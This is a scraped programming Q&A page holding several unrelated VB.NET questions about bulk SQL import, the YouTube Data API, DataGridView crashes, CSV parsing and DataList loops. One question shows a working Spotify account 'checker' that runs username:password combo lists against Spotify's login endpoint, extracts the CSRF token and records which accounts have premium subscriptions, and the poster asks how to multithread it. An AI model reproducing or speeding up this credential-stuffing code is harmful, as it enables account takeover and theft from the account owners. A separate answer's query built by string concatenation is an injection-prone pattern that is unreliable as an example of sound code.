Import very big text file into sql. Speed problem - sql

I must import a big text file into sql database.
The text file contains some 5 million of rows. :D
My pc is old ed I use vb.net, but is only for one shot.
When import started, the code read and entered 100 lines for second.
Is slowly but for one shot is not a problem.
Now, at 300.000 lines readed, it work ar 8 lines for second. :(
The goal is far away....
The strange thing is, if I start from first line and in the database have 300.000 record, the speed is fast (100 L/s) even though I check that I don't have the record.
In sql I created a cluster index.
This is the vb.net code into BackgroundWorker DoWork:
Private Sub Bw_DoWork(sender As Object, e As DoWorkEventArgs)
Dim d = DirectCast(e.Argument, BwData).Path
Dim s = DirectCast(e.Argument, BwData).Start
Dim reader As IO.StreamReader = My.Computer.FileSystem.OpenTextFileReader(d)
Dim l As String
Dim lineIndex As Integer = 0
Dim lineStart As Integer = 0
Dim part As String() = Nothing
Try
Using ctx = New ContentsDBEntities
Dim rowN = s 'Math.Max(ctx.xHamster.Count - 100, 1)
Do
l = reader.ReadLine
If l Is Nothing Then
Exit Do
End If
part = l.Split("|")
If Bw.CancellationPending Then Exit Do
If lineIndex >= rowN AndAlso part.Length >= 14 Then
If lineIndex = rowN Then
lineStart = lineIndex
startAt = Now
End If
Dim vId = part(0)
If IsNumeric(vId) Then
Dim there = (From c In ctx.xHamster Where c.VideoId = vId Select c).FirstOrDefault
If there Is Nothing Then
Dim r = New xHamster With {
.VideoId = vId,
.Url = part(1),
.Umbed_Url = part(2),
.Title = part(3),
.Duration = StringToSec(part(4)),
.dateAdded = Date.Parse(part(5)),
.Thumb = part(6),
.Channels = part(7),
.Pornstars = part(8),
.MaxResolution = part(9),
.Orientation = part(10),
.Title_RU = part(11),
.Username = part(12),
.Description = part(13)}
ctx.xHamster.Add(r)
If lineIndex Mod 100 = 0 Then
ctx.SaveChanges()
End If
End If
End If
End If
lineIndex += 1
DirectCast(sender, BackgroundWorker).ReportProgress(lineIndex, lineStart)
Loop Until l Is Nothing
reader.Close()
ctx.SaveChanges()
End Using
Catch ex As Exception
Debug.Print(ex.Message)
End Try
End Sub
Do you have a trick for me?
Why does the speed decrease?
Thank you
Luca

Related

Get YouTube channel data using Google YouTube Data API in VB.NET

I'd like to get channel data using the YouTube Data API in a VB.NET application. I can't find any kind of documentation, everything is in .NET and Google documentation is way too cryptic for me.
I used to get these data using URL request, but I'd like to do it more... programmatically!
I added Google.Apis.YouTube.v3 Nuget, but can't figure how to set credential and retrieve data.
There is a VB .NET ResumableUpload example in this GITHUB repository that contains some code that should help you get started.
This is some sample code that retrieves all of the videos in the "Uploads" PlayList for the logged on channel.
Imports Google.Apis.YouTube.v3
Imports Google.Apis.YouTube.v3.Data
...
...
Dim strUploadsListId As String = ""
Try
bOK = False
Dim objChannelListRequest As ChannelsResource.ListRequest = objYouTubeService.Channels.List("contentDetails")
objChannelListRequest.Mine = True
Dim objChannelListResponse As ChannelListResponse = objChannelListRequest.Execute
Dim objChannel As Channel
For Each objChannel In objChannelListResponse.Items
strUploadsListId = objChannel.ContentDetails.RelatedPlaylists.Uploads ' The Uploads PlayList
Debug.WriteLine("PlayList ID=" & strUploadsListId)
Next
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "ChannelListRequest")
End Try
If bOK Then
Dim objNextPageToken As String = ""
While Not objNextPageToken Is Nothing
Dim objPlayListItemRequest As PlaylistItemsResource.ListRequest = objYouTubeService.PlaylistItems.List("contentDetails")
Dim objPlayListItemsListResponse As PlaylistItemListResponse = Nothing
objPlayListItemRequest.PlaylistId = strUploadsListId
objPlayListItemRequest.MaxResults = 50
objPlayListItemRequest.PageToken = objNextPageToken
Try
bOK = False
objPLayListItemsListResponse = objPlayListItemRequest.Execute
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "PlayListRequest")
End Try
If bOK Then
Dim objPlayListItem As PlaylistItem
Dim strVideoIds As New StringBuilder("") With {.Capacity = objPLayListItemsListResponse.Items.Count * 16}
For Each objPlayListItem In objPlayListItemsListResponse.Items
strVideoIds.Append(objPlayListItem.ContentDetails.VideoId)
strVideoIds.Append(",")
Next
strVideoIds.Remove(strVideoIds.Length - 1, 1) ' Remove Last Character (Extra comma)
Dim objListRequest As VideosResource.ListRequest
Dim objVideoListResponse As VideoListResponse = Nothing
Try
bOK = False
objListRequest = New VideosResource.ListRequest(objYouTubeService, "id,snippet,recordingDetails,status,contentDetails") With {.Id = strVideoIds.ToString}
Debug.WriteLine("IDs to retrieve: " & strVideoIds.ToString)
objVideoListResponse = objListRequest.Execute
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "ListRequest")
End Try
If bOK Then
For Each objVideo As Video In objVideoListResponse.Items
Dim TheTitle as string = objVideo.Snippet.Title
Dim Embeddable as boolean = objVideo.Status.Embeddable
Dim dtRecorded as date - Nothing
If (Not objVideo.RecordingDetails Is Nothing) AndAlso (Not objVideo.RecordingDetails.RecordingDate Is Nothing) Then
dtRecorded = CDate(objVideo.RecordingDetails.RecordingDate)
End If
Dim Duration As Date = GetDuration(objVideo.ContentDetails.Duration)
Dim Category As string = objVideo.Snippet.CategoryId
Dim PrivacyStatus As string = objVideo.Status.PrivacyStatus
Dim Description as string = objVideo.Snippet.Description AndAlso
'
'
Next
End If
End If
objNextPageToken = objPlayListItemsListResponse.NextPageToken
End While
End If
'_______________________________________________________
Friend Function GetDuration(ByVal Duration As String) As Date ' Only an elapsed time value
' Format returned from YouTube: PT#H#M#S or PT#M#S or PT#S
GetDuration = EMPTYDATE
If Duration IsNot Nothing Then
If Duration.StartsWith("PT") Then
Dim x As Integer = 2
Dim y As Integer = x
Dim Hours As Integer = 0
Dim Minutes As Integer = 0
Dim Seconds As Integer = 0
Do
While y < Duration.Length AndAlso IsNumeric(Duration.Substring(y, 1))
y += 1
End While
If y < Duration.Length Then
Select Case Duration.Substring(y, 1)
Case "H"
Hours = CInt(Duration.Substring(x, y - x))
Case "M"
Minutes = CInt(Duration.Substring(x, y - x))
Case "S"
Seconds = CInt(Duration.Substring(x, y - x))
End Select
End If
x = y + 1
y = x
Loop Until x >= Duration.Length
GetDuration = CDate("01/01/1900 " & Format(Hours, "00") & ":" & Format(Minutes, "00") & ":" & Format(Seconds, "00"))
End If
End If
End Function
I did it, thanks to Mike Meinz and th Visual Studio debugging tools
Here the code to get some channels (not necessary yours) data using YouTube Data API in a VB.NET:
Dim youtube_api_key As String = "Your_Key"
Dim youtube_api_application_name As String = "Your_Project_Name_In_the_Google_Developper_Console"
Dim youtube_initialiser As New Google.Apis.Services.BaseClientService.Initializer()
youtube_initialiser.ApiKey = youtube_api_key
youtube_initialiser.ApplicationName = youtube_api_application_name
Dim youtube_service As Google.Apis.YouTube.v3.YouTubeService = New YouTubeService(youtube_initialiser)
Dim objChannelListRequest As ChannelsResource.ListRequest = youtube_service.Channels.List("id,snippet,statistics")
objChannelListRequest.Id = youtube_channel
Dim objChannelListResponse As ChannelListResponse = objChannelListRequest.Execute()
Debug.Print(objChannelListResponse.Items(0).Snippet.Description)
Debug.Print(objChannelListResponse.Items(0).Statistics.SubscriberCount)
Debug.Print(objChannelListResponse.Items(0).Statistics.VideoCount)
Debug.Print(objChannelListResponse.Items(0).Statistics.ViewCount)

Adding rows to a DataGridView control causes crash but only on second attempt

I have a DataGridView (dgvNew) which is populated by a JSON file which is located by a FileSystemWatcher, data is added row by row after being read. It works fine on first file. But if i trigger a new file by copying and pasting the same JSON file it adds the rows again row by row as id expect, but then the whole form crashes with no error.
I've tried TRY..CATCH with WHILE loops for opened the files which works in terms of openning them and adding rows, i just don't understand why it crashes. The code continues to step through regardless even though the form is frozen ? is it Thread related ?
Public Sub subParseJSONs(strFilePath As String, strDesiredField As String)
Dim json As String
Dim strMachine As String
Dim read As New Newtonsoft.Json.Linq.JObject
Dim booErrorJSNOArrRead As Boolean
Dim i As Integer
Dim dgvIndex As Integer
Dim booOpened As Boolean
Dim k As Integer, j As Integer
booOpened = False
k = 1
j = 1
json = Nothing
While json Is Nothing
Try
j = j + 1
If j = 10 Then
MessageBox.Show("J integer reached 10")
Exit While
Exit Try
End If
json = Replace(Replace(System.IO.File.ReadAllText(strFilePath), vbLf, ""), vbTab, "")
read = Newtonsoft.Json.Linq.JObject.Parse(json)
Catch ex As IOException
'MessageBox.Show(ex.Message)
Threading.Thread.Sleep(300)
'GoTo EndOfSUb
Catch ex As Exception
'MessageBox.Show(ex.Message)
Threading.Thread.Sleep(300)
'GoTo EndOfSUb
Finally
booOpened = True
End Try
End While
booErrorJSNOArrRead = False
i = 0
dgvNew.ColumnCount = 6
dgvNew.Columns(0).Name = "TempID"
dgvNew.Columns(1).Name = "DriverName"
dgvNew.Columns(2).Name = "Seat"
dgvNew.Columns(3).Name = "RaceTime"
dgvNew.Columns(4).Name = "ResultTime"
dgvNew.Columns(5).Name = "CarDriven"
dgvNew.RefreshEdit()
dgvNew.Refresh()
Do Until i = read.Item("Result").Count
If Not read.Item("Result")(i)("DriverName") = "" Then
Dim milliseconds As Double = Convert.ToDouble(read.Item("Result")(i)("TotalTime"))
Dim ts As TimeSpan = TimeSpan.FromMilliseconds(milliseconds)
Dim strMMSSmmm As String = ts.Minutes.ToString & ":" & ts.Seconds.ToString & "." & ts.Milliseconds.ToString
Dim row As String() = New String() {i + 1,
read.Item("Result")(i)("DriverName"),
read.Item("Result")(i)("DriverName"),
strMMSSmmm,
DateTime.Now, read.Item("Result")(i)("CarModel")}
dgvNew.Rows.Add(row)
End If
i = i + 1
Loop
read = Nothing
End Sub
I'm expecting new rows to be added to the bottom of dgvNew, which they are, but then it crashes ?

Multithreading and splitting the workload

So I created a spotify checker to check a list of accounts on their logins and current subscription, This works fine, but it's only running on one thread and that in my opinion is really slow. So I started searching around for multithreading (I am pretty new to vb.net and am trying to learn this way.) But everything I threw at it would just run all threads seperately on the same accounts without any difference in results, just that they were printed out multiple times.
The code for the sub Login:
Public Sub Login()
Dim index As Integer = 0
While index < Combos.Count
Dim str() As String = Combos(index).Split(":")
Using req As New HttpRequest
req.UserAgent = Http.ChromeUserAgent
req.Cookies = New CookieDictionary()
req.Proxy = Nothing
req.IgnoreProtocolErrors = True
req.Get("https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F")
Dim token As String = req.Cookies.ToString
Dim csrf As String = Regex.Match(token, "csrf_token=(\S+)").Groups(1).ToString
req.Referer = "https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F"
req.AddHeader("Cookie", "csrf_token=" + csrf + "; __bon=MHwwfDQ1MzY4Nzk4M3wxOTA1NDg5NTI4NnwxfDF8MXwx; fb_continue=https%3A%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F; remember=false")
req.AddParam("remember", "false")
req.AddParam("username", str(0))
req.AddParam("password", str(1))
req.AddParam("captcha_token", "")
req.AddParam("csrf_token", csrf)
Dim respo As String = req.Post("https://accounts.spotify.com/api/login").ToString
If respo.Contains("displayName") Then
Dim IT As New ListViewItem
IT.Text = str(0)
IT.SubItems.Add(str(1))
Dim html As String = req.Post("https://spotify.com/account/subscription/").ToString
Dim Info As Match = Regex.Match(html, "<h3.*>(.*)<\/h3>")
Dim Type As String = Info.Groups(1).Value
If Type.Contains("Spotify Premium") Then
IT.SubItems.Add("Spotify Premium")
ListView1.Items.Add(IT)
Label3.Text += 1
Label1.Text += 1
ElseIf Type.Contains("Premium for Family") Then
IT.SubItems.Add("Spotify Premium for Family")
ListView1.Items.Add(IT)
Label3.Text += 1
Label1.Text += 1
Else
If StrafeCheckBox1.Checked = False Then
Label2.Text += 1
Else
IT.SubItems.Add("Free")
ListView1.Items.Add(IT)
Label1.Text += 1
End If
End If
Else
Label2.Text += 1
End If
End Using
index += 1
StrafeProgressBar1.Value = index
If index = Combos.Count Then
MsgBox("Done, successfull logins: " + Label1.Text)
End If
End While
End Sub
Code for the start button:
Private Sub LoginBTN_Click(sender As Object, e As EventArgs) Handles StartBTN.Click
Dim IH As New Thread(AddressOf Login) : IH.Start()
StrafeProgressBar1.Maximum = Combos.Count
End Sub
So what I basically want to know, is how I get the threads to split the
workload evenly. and finish the job a lot quicker.
All help is appreciated.

only read certain columns from a csv

so I have a csv file that has extra commas in it. I know I won't ever need anything after a specific column. So basically any information after column 12 I won't need. I don't have a say on how the csv looks when it gets to me, so I can't change it there. I was wondering if there is a way to just read the first 12 columns and ignore the rest of the csv file.
this is what the code looks like now.
thank you for any help
Private Sub GetData(ByVal Path As String, ByRef DG As DataGridView, Optional ByVal NoHeader As Boolean = False)
Dim Fields(100) As String
Dim Start As Integer = 1
If NoHeader Then Start = 0
If Not File.Exists(Path) Then
Return
End If
Dim Lines() As String = File.ReadAllLines(Path)
Lines(0) = Lines(0).Replace(Chr(34), "")
Fields = Lines(0).Split(",")
If NoHeader Then
For I = 1 To Fields.Count - 1
Fields(I) = Str(I)
Next
End If
dt = New DataTable()
For Each Header As String In Fields
dt.Columns.Add(New DataColumn(Header.Trim()))
Dim desiredSize As Integer = 11
While dt.Columns.Count > desiredSize
dt.Columns.RemoveAt(desiredSize)
End While
Next
For I = Start To Lines.Count - 1
Lines(I) = Lines(I).Replace(Chr(34), "")
Fields = Lines(I).Split(",")
Dim dr As DataRow = dt.Rows.Add()
For j = 0 To Fields.Count - 1
dr(j) = Fields(j).Trim()
Next
Next
DG.DataSource = dt
End Sub
Really all you need to do is, in the for loop where you iterate through Fields at the bottom, replace For j = 0 to Fields.Count - 1 with For j = 0 to 11.

loop data in datalist

How do i loop through each data in the datalist? Because i am currently getting one value from "Label8" which causes my "Label7" to show "No" for all.
Protected Sub DataList2_ItemDataBound(ByVal sender As Object, ByVal e As System.Web.UI.WebControls.DataListItemEventArgs) Handles DataList2.ItemDataBound
For Each li As DataListItem In DataList2.Items
Dim labelasd As Label = DirectCast(e.Item.FindControl("**Label8**"), Label)
Dim reviewid As Integer = labelasd.Text
Dim connectionString As String = _
ConfigurationManager.ConnectionStrings("ConnectionString").ConnectionString
Dim connection As SqlConnection = New SqlConnection(connectionString)
connection.Open()
Dim sql As String = "Select Count(reviewYes) AS Expr1 From ProductReviewHelp Where ProductReviewID = " & reviewid & ""
Dim command As SqlCommand = New SqlCommand(sql, connection)
Dim reader As SqlDataReader = command.ExecuteReader()
Dim countofreview As Integer = 0
Dim reviewcountboolean As Boolean
If (reader.Read()) Then
If (IsDBNull(reader.GetValue(0)) = False) Then
countofreview = reader.GetValue(0)
End If
End If
If countofreview = 0 Then
reviewcountboolean = False
Else
reviewcountboolean = True
End If
If (reviewcountboolean = True) Then
Dim label1 As Label = DirectCast(e.Item.FindControl(**"Label7"**), Label)
label1.Text = "Hello"
ElseIf (reviewcountboolean = False) Then
Dim label1 As Label = DirectCast(e.Item.FindControl(**"Label7"**), Label)
label1.Text = "No"
End If
Next
End Sub
How do i loop through each data in the datalist? Because i am currently getting one value from "Label8" which causes my "Label7" to show "No" for all.
You are looping on your DataList2 items but, at every loop, you update the label7 with the logic of the current item, effectively removing the result of the previous loop. This means that, when you reach the last item, the Label7 will reflect the string "Hello" or "No" depending on the logic applied to the last item in your loop.
Apart from this logical error, you have also numerous errors in the code shown.
The connection is never closed.
You use string concatenation instead of parameters.
You use ExecuteReader when in this case an ExecuteScalar is better
suited.
You can iterate through then using a loop here is an example
Try
readFromDL1 = DirectCast(SqlDataSource1.Select(DataSourceSelectArguments.Empty), DataView)
readFromQ = DirectCast(SqlDataSource7.Select(DataSourceSelectArguments.Empty), DataView)
Catch ex As Exception
End Try
'End
'datalist1
i = 0
_rowCount = DataList1.Items.Count
If _rowCount > 0 Then
_getCall = DataList1.Items.Item(i).FindControl("lnkEdit")
End If
For Each readr As DataRowView In readFromQ
findQNumber = readr(1).ToString()
For Each readfdlr1 As DataRowView In readFromDL1
findQNumber1 = readfdlr1(1).ToString
Try
indexofitems = DataList1.Items.Item(i1).ItemIndex
If findQNumber.ToString = findQNumber1.ToString Then
_getCall = DataList1.Items.Item(indexofitems).FindControl("lnkEdit")
_getCall.Text = "Called"
_getCall.Enabled = False
_getCall.ForeColor = Drawing.Color.Red
_getCall.BackColor = Drawing.Color.Yellow
End If
i1 = i1 + 1
Catch e As Exception
End Try
Next
i1 = 0
i = i + 1